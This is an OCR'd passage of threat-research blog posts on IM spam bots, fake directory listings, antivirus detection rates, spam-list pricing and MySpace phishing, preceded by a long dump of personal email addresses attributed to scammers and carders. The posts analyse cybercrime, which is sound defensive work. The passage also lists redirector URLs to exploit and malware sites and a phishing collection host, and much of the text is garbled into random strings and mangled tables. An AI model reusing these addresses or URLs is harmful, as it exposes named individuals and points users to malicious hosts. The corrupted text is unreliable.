tchaow23@gmail.com 
ivry.david@yahoo.com 
donidoni419@gmail.com 
donpresentable@yahoo.com 
justas0O077@gmail.com 
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saintkillio@gmail.com 
babas80@mail.com 
allendv11@yahoo.com 
qwert@live.com 
dadsaral6@yahoo.com 
mullernice@yahoo.com 
Jerry.smithy98@gmail.com 
zzzzci@yahoo.com 
reservelibertyl11@yahoo.com 
onyedeji@yahoo.com 
dr.lover919@gmail.com 
andi-.cs@msn.com 

bujaross psh@hotmail.com 
ndahg@cellurl.com 
jonhunch@yahoo.com 
duxcic@live.com 
williamhmcraven@hotmail.com 
x00x@live.fr 
kenneth.douglass@yahoo.co.uk 
pennywilliams675@yahoo.com 
castrolbronx@aol.com 
AnnonyH4ck@msn.com 
Isabellaone23@gmail.com 
joseph oneOO@yahoo.com 
darkroxalbania@gmail.com 
libaneso@yahoo.se 
bmark285@yahoo.co.uk 
bmark2851@yahoo.co.uk 
gtosauh@yahoo.com 
kanibal58@gmail.com 
alo@hitechshop.biz 
alosa@hitechshop.biz 
unmodjo@yahoo.com 
dadime _1@yahoo.com 


Isabellaone23@gmail.com 
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joseph oneO0O0O@yahoo.com 
darkroxalbania@gmail.com 
libaneso@yahoo.se 
bmark285@yahoo.co.uk 
bmark2851@yahoo.co.uk 
alo@hitechshop.biz 
Kingz@King.com 
gtosauh@yahoo.com 
kanibal58@gmail.com 
alosa@hitechshop.biz 
unmodjo@yahoo.com 
alexmiettaux@live.fr 
cematex1001@yahoo.com 
dr _uploader@yahoo.com 
auth _suc@yahoo.com 
neyopumping2@yahoo.com 
r3alitystudy@yahoo.com 
totoriinasalvadore@gmail.com 
generalseven@hotmail.com 
secsion@yahoo.com 
eliteace@hushmail.com 
jsvaldez809@gmail.com 
better1512@yahoo.com 
khariemshaw@ymail.com 
xinoxl.mgqi@gmail.com 

drop fast@yahoo.com 

alltv 2006@yahoo.es 
blackangel63079@gmail.com 
allbest@ymail.com 
sbobo4luv64@yahoo.com 
daniyal center@hotmail.com 
ssherali73@gmail.com 
joinedgnoyth@gmail.com 
kanesangels@yahoo.co.uk 
drilonnpajazitii@gmail.com 
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asad _ja@gmail.com 
maqsoodsiddiqui@rocketmail.com 
xXx@ymail.com 

trade _pride@yahoo.com 
bethoven06@hotmail.com 
geminis3272@live.com 
alperies@gmail.com 
feugiernoel@live.fr 

ida _egha@hotmail.com 
gidiwalker@yahoo.com 
saigongangs@yahoo.com 
cara _faya@live.fr 
pitbullcrime@y7mail.com 
gogaiespecatulosu@yahoo.com 
kiko-bibo@live.fr 
ibrahimkennan@gmail.com 
iasa@post.com 
Ig6.lg6@gmail.com 
xbeat@hmamail.com 
rebornprince@rocketmail.com 
xratio@tormail.org 

barbeau _777@yahoo.ca 
negptv@hotmail.com 
cloiks@gmail.com 
wors@gma.com 
vip|@yahoo.com 
gteamceo@gmail.com 
mark9genovese@gmail.com 
unknown.identity163@gmail.com 
idris2108lev@gmail.com 
flooasdas@ms.com 
gabiesluv@yahoo.com 
kisam176@yahoo.com 
fastgamer917@gmail.com 


mail@yahoo.com 
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dennyarthur633@yahoo.com 
kelly4hans@gmail.com 
KAGREK@YAHOO.COM 
boddx@yahoo.com 
trustmankind@yahoo.com 
odekazeem@yahoo.com 
lehmandamion@yahoo.com 
vista4ocean@gmail.com 
moaaaaad@yahoo.com 
mossano23@yopmail.com 
guylife@yahoo.com 
lewis1299@ymail.com 
rsic.usa@gmail.com 
st_7@in.com 

maxi tha _chiller@hotmail.de 
par.excellent@hush.com 
abdellah77@gmail.com 
realbuyer4sure@yahoo.com 
saintfrank20002000@gmail.com 
hhackmania@yahoo.com 
egypt.network12@Gmail.com 
mrmlovie@gmail.com 
jimbig29@yahoo.com 

vot _aleks@mail.ru 
cox@vroxy.net 

enisi 7O@hotmail.com 
james7bnr@gmail.com 
ms6al@hotmail.com 
maliksabihzain@yahoo.com 
khoa.khoa5@gmail.com 
aagt.zurx@gmail.com 
lamama@msn.com 
abiram100@yahoo.com 
sadasd@yahoo.com 
k-r@hotmail.com 
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ajsdj@man.com 
chrismandel@live.com 
mi.asm@hotmail.com 
michealdlogistics@gmail.com 
fimex2002@yahoo.com 
bensonwayne88@yahoo.com 
obeleoneson@gmail.com 
are@jefw.com 
willsresults@gmail.com 
darl _evil7358@yahoo.com 
jol6@web.de 
gmx@insorg-mail.info 
apachihck@yahoo.com 
hackingislearning@yahoo.com 
montanabank@jabber.org 
mdsecond@rocketmail.com 
weffy61@gmail.com 
gimwd@hotmail.com 
dashmiris@live.com 
i9n@live.com 
seun solara@yahoo.com 
schuenke.william@yahoo.com 
attamills15@gmail.cokm 
giggsclarkO7@yahoo.com 
mikewaals@gmail.com 
ksankfnafsk@yahoo.com 
run2jeff4l@yahoo.co.uk 
drbryn@live.com 
lewistraevis@yahoo.com 
gento @msn.com 
Michelle _krosO7@yahoo.co.uk 
boboomonija@gmail.com 
ramboboboo@yahoo.com 
lidhume@gmail.com 
msperfectman@yahoo.ca 
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asd@asd.com 
zceed|p@gmail.com 
SellerOnline@Jabber.com 
886824@mail.ru 
cardersu@gmail.com 
vinipooh123@gmail.com 
carder001@gmail.com 
copyright@yahoo-inc.com 
paypal777@jaim.at 
BowsandribbInsOl@gmail.com 
noreply@blogger.com 
car@ebay.com 
brendastuart@rocketmail.com 
eddypearson@gmail.com 
gewtghdcu@mail.cn 
bashorg@talking.cc 
iceix@secure-jabber. biz 
shwark.power.andrew@gmail.com 
johnlecun@gmail.com 
gribodemon@pochta.ru 
glazgo-update-notifier@gajim.org 
gribo-demon@jabber.ru 
aqua@incomeet.com 
vugar@kouliyev.com 
darwick@cyberground.hu 
abuse@dc.volia.com 
ugmarketgood@gmail.com 
coldhaxor@gmail.com 
readybusiness 1995@yahoo.com 
teamcvv@yahoo.com 
boss.cvv52@yahoo.com 
Track2teacher@hotmail.co.uk 
gar@place.com 
gar@otherplace.com 
freon@cutemail.org 
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4.4.28 Response Rate for an IM Malware Attack (2008-04-30 09:17) 
Message sentto: 5 Contacts 


pygzfdsb 
gemagaztn 


riczntoi £ 
tfhgrcbg: [msn]: Message sent to: 9 Contacts 
vpbalkck ; 
qzzbrdzr # 
phrpiggg 
wtoxgook 4 
rashxhxc 
matdctmn 
matdctmn: [msn]: Me 
furwdkeu wn 


qqsutfuya 
epaocjml 
qabiqagw 
afeilkeg 


ggmyjaw 


ssmyjulw 

fqwulnuc 

<P PGvpgg 

otfnkptl 

qrfwkzto 

mslhfqgf 

qkejiroz = 


0:34 ndizqgum: [msn]: Message sentto: 16 Contacts 


Remember the [L]JMSN Spamming Bot in action? Consider this screenshot not just as a 
real-example of IM spamming in action, but also, pay attention to the response rate with the 
number of messages sent, and response in the form of new malware infected hosts joining an 
IRC channel. Keeping it Simple Stupid to directly spam the binary locations is still surprisingly 
working, taking Stormy Wormy’s last several campaigns, but with the recent spamming of live 
exploit URIs and malware using Google ads as redirector, for instance : 


- google.com/pagead/iclk?sa=I &ai=dhobOez &num=57486 &adurl=http:// mpharm.hr/video 
_233.php 

- google.com/pagead/iclk?sa=| &ai=YQdWjxe &num=81899 S&adurl=http:// www.1- 
pltnicka.sk/lib vid.ph p 

- google.com/pagead/iclk?sa=l &ai=MKRCVFW &adurl=// bestsslscripts.com/goog/online- 
casino-gambling.htm| 

- google.com/pagead/iclk?sa=I &ai=Hydrocodone &num=001 &adurl=http:// hydrocodone.7- 
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ap9cm76v4sv@nameprivacy.com 
risk@nacha.org 
alerts@nacha.org 

risk _manager@nacha.org 
alert@nacha.org 
admin@nacha.org 
transactions@nacha.org 
ach@nacha.org 
payment@nacha.org 
transfers@nacha.org 
payments@nacha.org 
info@nacha.org 
abominatingr@gmail.com 
adjournth@gmail.com 
alwaysw7@gmail.com 
anaestheticsnz556@gmail.com 
analog@gmail.com 
anthropologyiI@gmail.com 
bagateller67@gmail.com 
bawlctl@gmail.com 
beachcombersbdu88@gmail.com 
becominglyO0O1@gmail.com 
belligerencyO28@gmail.com 
biweekliesqa38@gmail.com 
butteriesldn@gmail.com 
costs@gmail.com 
dependenceq@gmail.com 
dhakatx223@gmail.com 
dismountsO5@gmail.com 
distinguishedxe4@gmail.com 
dogwoodui449@gmail.com 
dryadd@gmail.com 
earthworkssmu44@gmail.com 
episodesmf3@gmail.com 


epistolarieskud474@gmail.com 
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excusingo6049@gmail.com 
foxtrotteds@gmail.com 
guyinghr6@gmail.com 
hairiestrwv95@gmail.com 
heartbreako0O@gmail.com 
ethanallenstyle@email.ethanallen.com 
CRESTOR@email.CRESTOR.com 
citicards@info.citibank.com 
Walgreens@email.walgreens.com 
info@eddiebauerfriends.com 
redicard@redroofinn.bfi0.com 
targetdailydeals@targetnewsletter.bfio.com 
shellcreditcard@info.accountonline.com 
TargetNews@target.bfio.com 
alert@federalreserve.gov 
alerts@federalreserve.gov 
fedwire@federalreserve.gov 
info@federalreserve.gov 
information@federalreserve.gov 
helpedcf201@gmail.com 
hotelierpv186@gmail.com 
importunitymn2@gmail.com 
indefinites@gmail.com 
indispensably950@gmail.com 
irishwoman0463@gmail.com 
islanderl18@gmail.com 
kinkedhby9@gmail.com 
knottiestn@gmail.com 
kropotkinci@gmail.com 
litaniesO@gmail.com 
locomotivezq84@gmail.com 
lugsfo@gmail.com 
manfullym7@gmail.com 
matzoshl229@gmail.com 
memorizingxf7@gmail.com 
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micronsv1@gmail.com 
mines2@gmail.com 
morerkc896@gmail.com 
murkierp9@gmail.com 
northwesterlyl4@gmail.com 
orbiting4@gmail.com 
organsgqz3@gmail.com 
painfullerujt3@gmail.com 
paltryr6é3@gmail.com 
phwpal@gmail.com 
pincushions|206@gmail.com 
polyglotsxn51@gmail.com 
prohibitorys49@gmail.com 
queenslandpu9@gmail.com 
refractingO5@gmail.com 
repaymentsrdr@gmail.com 
rerouteso6@gmail.com 
reselljucd@gmail.com 
rhinestoneo@gmail.com 
ricksjn@gmail.com 
ridgepolem843@gmail.com 
sandieruj@gmail.com 
scabbedl6@gmail.com 
septuagenarians8917@gmail.com 
siberiatl@gmail.com 
slumberad148@gmail.com 
soldieringr7065@gmail.com 
solemnizedo36@gmail.com 
soliloquizese3@gmail.com 
southernersh477@gmail.com 
speedilyby98@gmail.com 
spokes356@gmail.com 
subsidiaryuzxs5@gmail.com 
surmountableoa062@gmail.com 


ternsz27@gmail.com 
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thingsla@gmail.com 
totalitiest2@gmail.com 
tuberous37@gmail.com 
ufab3@gmail.com 
undergo@gmail.com 
undertakenf5@gmail.com 
undyingp8344@gmail.com 
unquestionablyww4@gmail.com 
untestedslq4201@gmail.com 
vegemitebe042@gmail.com 
victoriouswyt3@gmail.com 
warmheartedw4@gmail.com 
writhe78@gmail.com 
ddarwinn@gmail.com 
4docent@gmail.com 
Affkingl@gmail.com 
snapperofirc@yahoo.co.uk 
nick2chocolate@hotmail.com 
warpiglet@gmail.com 
admin@opton-security.com 
sales@opton-security.com 
code@opton-security.com 
Zombie KsA@hotmail.com 
mr.lonely420@hotmail.com 
helpdesk@nr3c.gov.pk 
catch.them@live.com 
x00mx00m@gmail.com 
farmanullahkhan@gmail.com 
hotpoint-O01@hotmail.com 
lovedontcostapenny 1@live.com 
amilliondollarsmile@hotmail.com 
cyber-criminal420@loverzpoint.net 
bigsmoke@loverzpoint.net 
outlaw41@live.com 


ahmed.kamal29@gmail.com 
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big smoke boom@yahoo.com 
loverzpoint@gmail.com 
sana2005@fastmail.fm 

iraq _resistance@yahoo.com 
yousoylammer@hotmail.com 
christ@yahoo.com 

gui _blt@live.com 
mistahxxxrightme@aim.com 
zapotin@hotmail.com 

guich x@aim.com 

guicho _1.1@roadrunner.com 
mijangos3@msn.com 


statikgto@gmail.com 


tarek bin _ziad army@yahoo.com 


thabet3000@gmail.com 
dh@thefuturemap.com 
dheathfield@hotmail.com 
msemenko@gmail.com 
Vicky.pelaez@eldiariony.com 
Nitrojen26@yahoo.com 
magiccOd3r@gmail.com 
sun.army@asia.com 
cardingw@gmail.com 
cardingworld cw@yahoo.com 
cwivanov@googlemail.com 
virtest@gmail.com 
gkook@checkjemail.nl 
youremail@yourdomain.com 
ecards@123greetings.com 
user@domain.com 
o5m@hotmail.de 
Jurm-Team@hotmail.com 
oi3@hotmail.com 
n5b@hotmail.com 

w _@hotmail.fr 
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noreply@mail.aba.com 

message ODRL6039id@mail.aba.com 
akanyovskiy@troyak.org 
try@5mx.ru 

wsw@maillife.ru 

bombs@maillife.ru 
taffy@blogbuddy.ru 
kievsk@yandex.ru 
iosapiel@yahoo.es 

honker Anysize@qq.com 
Soldier@CyberArmyOflran.com 
Soldier@IRCArmy.com 
privacy635948@domainprivacygroup.com 
contact@myprivateregistration.com 
hjuahge@yeah.net 
plilkeg@126.com 
xihyakern@163.com 
userid@domain.tld 
iIRANiAN.CYBER.ARMY@GMAIL.COM 
supervise@cnnic.cn 
weewoo@yourmail.com 
phishthis@phishme.com 
consumeralerts@fdic.gov 
Montgomery@tppa.com 
Gayle.Leal@kotnet.org 
Erwin.Deleon@altern.org 


Stay tuned! 


1. https://1.bp. blogspot .com/-W_14jr0E7Rg/YFXKxkNBquI/AAAAAAAAL-s/PoGVuhv98EwF 7 CHi8nUzrmSf gi jB3VONQCLcBGASYHQ 
$318/Misc_01.jpg 


2. https: //ddanchev.blogspot .com/2021/03/exposing-currently-active-portfolio-of_9.htm 


17.3.11 Exposing a Currently Active Portfolio of Personal Email Address Accounts 
Belonging to 419 Scammers and Related Scammers - An OSINT Analysis 
(2021-03-20 12:41) 


[1] 
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site. info 


the response rate for the campaign can change in a minute. Go through a related post 
on "[2]Statistics from a Malware Embedded Attack" taking another perspective into considera- 
tion. 


1. http: //ddanchev. blogspot .com/2007/05/msn- spamming-bot . htm 
2. http: //ddanchev. blogspot .com/2008/02/statistics-from-malware-embedded-attack.htm 


4.4.29 Fake Directory Listings Acquiring Traffic to Serve Malware (2008-04-30 10:17) 


Index of / 


Name Last modified Size Description 


Parent Directory 
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Apache/ 1.3.26 Server at Port 80 


Malicious parties are known to deliver what the unsuspecting and unaware end user is search- 
ing for, by persistently innovating at the infection vector level in order to serve malware or 
redirect to live exploit URLs in an internal ecosystem that not even a search engine’s crawlers 
would bother crawling. What’s the trick in here? Using image files as bites to malware binaries, 
and acquiring traffic by generating fake directory indexes with hundreds of thousands of 
popular or segment specific keywords in the filenames, while attempting to trick the impulsive 
leecher by forcing a direct loading of anything malicious? Creative, at least according to 
someone who’s released such a fake directory listing, and is what looks like planning to come 
up with an automated approach for doing this. 


Inside a non-malicious download.php file : 
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$file = "sexy.gif"; 


header("Content-type: application/force-download"); 


header("Content-Transfer-Encoding: Binary"); 


header("Content-Disposition: attachment; filename=\"".basename( $file)."\""); 


readfile(" $file"); 


?> 


Spammers, phishers, malware authors, and of course, black hat search engine optimizers, are 
known to have been using technique for enforcing downloads, loading live exploit URIs, or 
plain simple redirection to a place where the malicious magic happens. 


A fake directory listing of images, where the images themselves load image files of the 
icon to make themselves look like images - trying saying this again, and consider this attack 
tactic as SEO 1.0, where the 2.0 stage has long embraced GUls and all-in-one anti-doorway 
detection techniques for blackhat SEO-ers to take advantage of. 
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4.4.30 Detection Rates for Malware in the Wild (2008-04-30 11:58) 


MALWARE THREAT CENTER 


1 
|__Abeumrc | DataAnatysis | Matware Community | News info | Pubtcaticns | Research Projects | 


s 
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Yet another [1]Early Warning Security Event System has been made available to the public, 
earlier this month. [2]The Malware Threat Center is currently generating automated tracking 
reports in the following sections : 


- Most Aggressive Malware Attack Source and Filters 

- Most Effective Malware-Related Snort Signatures 

- Most Prolific BotNet Command and Control Servers and Filters 
- Most Observed Malware-Related DNS Names 

- Most Effective Antivirus Tools Against New Malware Binaries 

- Most Aggressively Spreading Malware Binaries 
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Most Effective Antivirus Tools Against New Malware Binaries 


Tue Apr 29 12:50:38 2008 


Missed © Malwe 

Missed Logs = | 

Detects © Antiviry 175 

Rank Detects Missed Missed Log Product Vendor CC Product URL 

Ist 95% 6 M. Ss titen| tkarus Ikarus Security Software Ge) we wikarus-software.ot 
2nd 92% 133 AVG Missed MDSs hemi AVG Grisoft Inc Gd eexarisoftcom 

ord 90% 172 Antiver Missed MOTs heen! Anvivir Avira GR vewfiee-avcom 

4th 90% 173 DitOefender Migsed MOSs.htm! BROefender BitDefender Inc GB wer bitdefender.com 
Sth 89% 194 Webwasher-Gateway Missed MDSs.hemi Webwasher-Gateway Secure Computing GB wewtecurcecomawtinncom 
bh 38% 209 CAT-QuickHeal Missed MDSs dam CAT-QuickHeal Qwick Heal Technologies GH) asickheal.coin 

Teh 83% 283 Norman Migsed MOSz hte! Norman Norman Iec vyy.norman.com 

oth 83% 2387 E-Secure Misged MDSs bem! F-Secure F-Secure Corporation =| vey f-secure. con 

oh 83% 298 Kaspersky Missed MDSs.Atm! Kaspersky Kaspersky Lab Gi eewharpersky.com 
10th «=: 82% 315 o3 Clamav SourceFire GQ wev.clamuner 

Lith 80% 337 Microsoft Missed MDSs.hem! Microsoft Microsoft Corporation yyy microsoft.com 
L2th 79% 367 TheHacker Missed MOSs hte! TheHacker Macksof GM wew-hackso&. coon.pe 
13th 77% 390 VirusBuster Mizged MDSz hemi VirusBuster ViresBuster Led GE wwewirvsbusterhy 
Lath 77% 400 Avast Missed MDSs bem Avast ALWIL Software Ged eeavast.com 

15th 77% 404 F-Prot Migged MDS¢.htm! F-Prot Frisk Software International GB wee f-orot.com 

16th = 76% 425 Ahobab-V2 Missed MOSs hem! AhoLab-V3 AhnLab GE) xewshnlab.com 

17th 75% 424 eTrust-Vet Missed MDS s here eTrest-Vet Computer Associates at] vew.ca.com 

1 Oth 74% 446 Sophos Missed MOSz.hami Sophos Sophos Labs uve sophos.com 
19th 73% 463 Qriveb Missed MOSs demi Orweb Or. Web Gd weedreehcom 

20th 72% 435 Symantec Migsed MOSs hem! Symantec Symantec Corporation at] yyw symantec com 
2ist 71% 499 Rising Missed MDSz.hem! Rising Beijing Rising International Sofware GH) wwmizina-aicdal.com 
22nd «70% 516 YBA32 Missed MDSs.ham VBA32 VirusBlokade Led MB ee ete tale: 
230d 66% 390 Bands Missed MOSs.hem Pandas Pands Security wer pandasecumy.com 
24th «= 63% 638 McAfee Missed MDSz hem! McAfee McAfee Inc GD wre mcafer.com 
25th 62% 652 Fortinet Migsed MOS ttm! Fortinet Fortinet Inc GD vee formmercom 
26th «= 61% 605 NOOQ2v2 Missed MOS heen NOO32v2 EseTuc Ge eeweeet.com 

27th 55% 779 Authentium Missed MOSs herent Authentium Authentium La] wry authentium,.soe 
28th 35% 1136 Evido Missed MOSs hem! Ewido Ewido Networks fel vyw.ewido.net 

29h = 28% 1263 eSafe Missed MDSz.hem! eSafe Aladdin Knowledge Systeme CE) wewsladdin.com 


| was particularly interested in the rankings in the "Most Effective Antivirus Tools Against New 
Malware Binaries" section, especially its emphasis on malware that’s currently in the wild. 
Furthermore, to prove my point, you can see the top 10 list of Anti virus vendors as it were 
on the 20th, and the top 10 list of anti virus vendors as it were yesterday? Can you find the 
differences? Grisoft, Avira, Secure Computing and Quick Heal remain on the same 

positions, whereas the rest of the vendors are in a different rank, although on the 20th they 
were exposed to 1030 binaries only, and on the 29th to 1759. 


So what? In respect to signatures based malware scanning, every vendor has its 15 
minutes of fame, however, as [3]l pointed out two years ago : 


" Avoid the signatures hype and start rethinking the concept of malware on demand, 
open source malware, and the growing trend of malicious software to disable an anti virus 
scanner, or its ability to actually obtain the latest signatures available. " 


What has changed? The [4]DIY nature of malware building, the managed undetected bi- 
naries aS a service coming with the purchase of proprietary malware tools, the fact that 
[5]malware is tested against all the anti virus vendors and the [6]most popular personal 
firewalls before it starts participating in a campaign, and is also getting [7]benchmarked and 
optimized against the objectives set for its lifecycle. Moreover, with malware authors waging 
tactical warfare on the vendors infrastructure by supplying more malware variants than then 
can timely analyze, this tactical warfare on behalf of the malicious parties is only going to get 
more efficient. 


1. http: //ddanchev. blogspot .com/2007/06/early-warning-security-event-systems.htm 


2. 
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ttp://ddanchev .blogspot.com/2006/08/virus- outbreak-response-time.htm 
ttp://ddanchev. blogspot .com/2008/04/new-diy-malware-in-wild.htm 


3. 
4. 
5. http: //ddanchev.blogspot.com/2008/04/quality-and-assurance-in-malware.htm 
6. 
7. 


ttp://ddanchev.blogspot.com/2007/10/multiple-firewalls-bypassing.htm 


ttp://ddanchev. blogspot .com/2006/09/benchmarking-and-optimising-malware.htm 


4.5 May 


4.5.1 Testing Signature-based Antivirus Products Contest (2008-05-02 08:16) 


The Race to Zero 


This is [1]both interesting, yet irrelevant and outdated as well : 
"The Race to Zero contest is being held during Defcon 16 at the Riviera Hotel in Las 
Vegas, 8-10 August 2008. 


The event involves contestants being given a sample set of viruses and malcode to modify and 
upload through the contest portal. 


The portal passes the modified samples through a number of antivirus engines and determines 
if the sample is a known threat. 
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The first team or individual to pass theirs 
ample past all antivirus engines undetected wins that round. Each round increases 
in complexity as the contest progresses. " 


[2]What are the reactions of security vendors, AVs [3]in particular? The [4]best remark - 
" Security vendors began panning it immediately, saying it will simply help the bad guys learn 
some new tricks. " 


The bad guys will learn new tricks from the good guys modifying binaries to prove that 
anti virus signature scanning isn’t working? There’s no shortage of creativity and innovation 
on behalf of malware authors, and in reality,the good guys are supposed to learn from the bad 
guys in the sense of the techniques, tools and tactics they use to achieve such a high-level 
degree of now automated polymorphism. Moreover, the only thing the bad guys can learn 
from the good guys are the techniques the good guys use to make the bad guys’ living a pain, 
in fact obtain the tools and see their malware through the eyes of a good guy. 


Moreover, as I’ve already pointed out in a previous post, [5]Jundetected malware or mal- 
ware with the lowest possible detection rate is no longer created, it’s being generated thanks 
to: 


"[6]DIY nature of malware building , the managed undetected binaries as a service com- 
ing with the purchase of proprietary malware tools, the fact that [7]malware is tested against 
all the anti virus vendors and the [8]most popular personal firewalls before it starts participat- 
ing in a campaign, and is also getting [9]benchmarked and optimized against the objectives 
set for its lifecycle. " 


SIGs 
Sach 
Ov In all file 
(©) Between the markers 


Show SIGs 
The variants of the file will be 
crated with a byte modified in every 
position, once created you will have 
to scan the dir with your AY and 
Try detection click in Show SIGs . 


For this option you shoul activate the protection AV in realtime. b 
The sigs will be searched using 
the protection in realtime from AY 


Try 
SIGs: 


Legend Options 
™ Header PE © Decimal ©) Hexadecimal 
@ Oniginal part Directory where to keep the temporary parts: 
Stuffed part with 0 'CASZ\Temp\ q ¥ 
CI My AY allows exclude directory 
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Nowadays, even a [10]script kiddies’ favorite [11]Remote [12]Administration [13]Tool is 
empowered with such advanced point’n’click DIY type of features such as anti-sandboxing 
and anti-reverse engineering, either through the use of built-in such features, or outsourcing 
the process to someone who's excelling at the process. Undetected malware isn’t just coming 
as a product these days, it’s also getting pitched as a managed service on a per obfuscated 
binary basis. 


Thankfully, signature based malware scanning is slowly becoming just one of the many 
other alternative malware and behaviour detection approaches available within antivirus 
solutions these days, given the possibilities for [14]artificially messing up the industry’s count 
for malware variants. 


ttp://www.racetozero.net/index. htm 


1. 
2. http: //www.pcworld.com/businesscenter/article/145148/security_vendors_slam_defcon_virus_contest .htm 
3. 


ttp://www.zdnet.com.au/news/security/soa/Signature-based-antivirus-is-dead-get-over-it/0, 130061744, 33928 


527, 00.ht: 


Beyer op /aousan e/g Seep 5008000 ame eo eno ama] 
ttp://ddanchev.blogspot.com/2008/04/detection-rates-for-malware-in-wild.html 
cy 7 macau eleessst. con 2008 /04/amen ary cateare ta vala neal 
_hvtp://adanchey. blogspot. cos/2008/04/quality-and-aseurance-in-nalvare tal 
[ep //atenchay blogapot. con/2007/10/aulplendivevatier bypassing need 
_hvtp://adanchey. blogspot. con/2006/08 venchnarking-and-optinising-nalvare ia 
0. eas (aces cues poe cee 2000/19 /ancet cee ape can vioue™comica neal 
1 http://ddanchev. blogspot. con/2007/01/shark-rat-or-nalvare.htal 

2, fttp://adancher-bLogapot.com/2007/08/snark-7-aiy-auivare. head 

13, http: //adanchev. blogspot.con/2001/06/rats-or-nalvare. hl 

14, http: //blog.didierstevens.. com/2008/04/29/pdf- let-me-count~the-ways/ 


a 
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4.5.2 Segmenting and Localizing Spam Campaigns (2008-05-02 11:28) 


AIPYTME CTPAHDbI: 


1 000 000 email - 130¢ 

3 000 000 email - 200¢ 

5 000 000 email - 300¢ 

8 000 000 email - 500¢ 

12 000 000 email - 600¢ 

16 000 000 email - 7O0¢ 

32 000 000 email - 1000¢ 

50 000 000 email - 1200¢ 

100 000 000 email - 2000¢ 

200 000 000 email - 3000¢ 

300 000 000 email - 4000¢ 
KonmuectBo email agpecos B 6a3ax: 
Hc (@ Hany Gonee 100 mn. e-mail agpecos) 


BR@syrnua (8 Hany Gonee 5 mnH, e-mail aapecos) 

cu epmaHia (B Hany Gonee 20 mnH., e-mail agpecos) 
BR optyranua (B Hany Bonee 150 Thc. e-mail agpecoB) 
GBicnanua (6 Hany Gonee 1 mnH. e-mail agpecos) 
dana (6 Hanvun Gonee 1 mnH. e-mail aapecos) 
(@lsnonua (6 Hany Gonee 1 mnH., e-mail aapecos) 

GT ypu A (B Hannu Gonee 3 mnH, e-mail agpecos) 

\3 (B Hany Bonee 1 mnH. e-mail agpecos) 
DaaAranua (B Hanvuunt Gonee 1 mnH. e-mail agpecoe) 
B@ectpanua (B Hany Gonee 15 mMnH. e-mail aapecos) 
fmPocca (B Hanyu Bonee 20 mnH. e-mail agpecoB) 
M@Hoeaa SenaHaua (6 Hanyu Gonee 1 mnH, e-mail aapecos) 
Edcurranyp (B Hanvym Gonee 500 Thc. e-mail agpecoe) 
@yipauna (B Hanyu Bonee 2 mnH, e-mail aapecos) 


One-to-many or one-to-one communication channel? That’s the questions from a spam- 
mer’s perspective. Given that spammers have long embraced basic segmentation in their 
[1]harvested email databases, enforcing localization in each of their multinational campaigns, 
thereby increasing the probability for a higher response, was a logical trend to come, one that 
we’re currently witnessing on a large scale. [2]Outsourcing the localization process by using 
translation services on demand, for anything starting from phishing emails and spam, and 
going to malware campaigns, is starting to accelerate, due to the fact that these parties now 
know about the email address than they used to in the past. 


A Chinese user will never receive a spam message in German, and exactly the opposite, 
as spammers are getting more ROI conscious in everything they do, and therefore in the long 
term, the emphasis on the processing of sending the spam, may in fact shift to [3]higher 
expectations from bother masters with spammers requiring hosts with clean IP reputations 
in the very same fashion spammers want email databases of emails that still haven’t been 
spammed - well at least by them. 


And just like in any other market out there, the managed spamming appliance providers 
would inevitably vertically integrate to start offering database filtering and [4]verification of 
delivery services. With so many malware infected hosts, [5]spamming is getting cheaper, 
given the increasing number of market participants each of them consciously or subcon- 
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sciously engaging in permanent penetration pricing to end up undercutting those positioning 
spamming as a exclusive service. And when the process of sending, and providing huge lists 
of harvested emails is already a commodity, the competitions is shifting to the quality of the 
campaign. 


The attached screenshot represents a spamming provider’s "inventory" of emails per country, 
and price for a number of [6Jalready harvested emails, clearly demonstrating that when 
competition increases even in the underground market, the serious sellers start differentiating 
their propositions, taking spam in general a step beyond. 


. http: //ddanchev. blogspot . com/2006/09/email-spam-harvesting-statistics.htm 
. http: //ddanchev. blogspot .com/2008/02/localizing-cybercrime-cultural .htm 
. http: //ddanchev. blogspot .com/2008/02/malware- infected-hosts-as-stepping.htm 


ttp://ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample.htm 


. http: //radar.oreilly.com/archives/2007/01/spamonomics-101.htm 


ttp://ddanchev .blogspot.com/2007/01/inside-email-harvesters-configuration.htm 


4.5.3 MySpace Hosting MySpace Phishing Profiles (2008-05-05 09:29) 


jece or 
Forex Day Trading Com 
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Keep Your Account Seceret 


Member Logan 


Forget your paserard? 


Not 4 MySpace Member? Join FREE and Get a 
Connected! — _ 
lll 
- i 
After You Sign Up You Can: STUDIOCEREBRAL. 
> RECORDING $ 
© Croate Free Profiles on MySpace a Roars Bhghgy Sub & 
© Upload Pictures & Write Blog 
© Use MySpace Mal & Instant Messenger 
Allgemein 


The ongoing arms race between phishers and social networking sites, is a great example of 
how malicious parties continue to be a step ahead of the reactive response of those and many 
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other web properties. The majority of phishing emails usually take advantage of typosquatting, 
or sub-domaining to the point where the URL is perfectly mimicking the only property’s web 
application structure. There are however, these exceptions adapting to current security 
practices in place, and abusing them. 


The [1]large scale myspace phishing attack that | assessed in November, 2007, was 
[2]particularly interesting to discuss because of [3]its internal spamming structure - a social 
networking account that’s already been phished is used to disseminate the phishing urls to all 
of its friends, collecting accounting data and serving malware. 
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The phishing tactic that I’ll assess in this post, demonstrates the adaptability of phishers 
whose efforts to adapt to MySpace’s current security practices in place, have greatly improved 
their chances for tricking a large number of visitors. How come? They are not using the natural 
profile.myspace.com.bogusdomain.info as usual, but are actually using authentic MySpace 
phishing profiles, hosted at MySpace.com. 


Key summary points : 


- phishers are generating phishing profiles making it look like the visitor hasn’t authenti- 
cated herself to view a profile, and pushing the fake login form in front of the fake profile 

- the phishing profiles are hosted at MySpace.com 

- ignoring the profile’s original layout, the fake login windows is pushed upon visiting a phishing 
profile in front of the profile 

- from a social engineering perspective, given that the "action" is happening at MySpace.com, 
from spamming the phishing profile, to more users getting tricked given its not a secondary 
domain, that’s an example of social engineering going beyond the average typosquatting 

- upon logging in reasonably thinking the user is at MySpace.com, the accounting data is 
forwarded to a phishing host located on a free web space provider 
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Let’s demonstrate the technique by assessing a currently active phishing profile - mys- 


pace.com/ecslut which you can also see in the screenshot above. 


Once the accounting 


data gets submitted to the profile hosted at MySpace.com, it redirects the output to mys- 
pacel01.freeweb7.com/next.php , where a Google Analytics with id "UA-3234554-2" collects 


metrics for the campaign, then its forwards to MySpace’s main page. 


A phishing campaign that’s spamming millions of users with myspace101.freeweb7.com 
wouldn’t really last online long enough for someone to fall victim into the scam. But when 
phishers shift the tactic from phishing pages relying on typo/cybersquatting to phishing 
profiles and start spamming with myspace.com/phishing _profile , success rate is prone to sky 


rocket. 
